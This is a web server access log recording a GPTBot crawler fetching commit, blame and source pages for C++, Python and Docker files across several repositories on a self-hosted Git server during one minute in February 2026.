"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" +[17/Feb/2026:16:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12992] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10683] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10232] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:16:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10685] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:16:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13923] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13921] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12995] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12994] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=html" [Client 74.7.227.38] [Length 22561] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 44639] [Gzip 12.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" +[17/Feb/2026:16:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:16:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8493] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:16:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8509] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" +[17/Feb/2026:16:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7653] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" +[17/Feb/2026:16:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=open" +[17/Feb/2026:16:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7656] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" +[17/Feb/2026:16:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:09:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8496] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:16:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8497] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=closed" +[17/Feb/2026:16:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8499] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=furthestduedate&state=closed" +[17/Feb/2026:16:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8495] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:16:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8502] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" +[17/Feb/2026:16:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=closed" +[17/Feb/2026:16:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" +[17/Feb/2026:16:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/update_status.py" +[17/Feb/2026:16:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16166] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" +[17/Feb/2026:16:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 12989] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" +[17/Feb/2026:16:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" +[17/Feb/2026:16:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10969] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14296] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11886] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" +[17/Feb/2026:16:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13019] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" 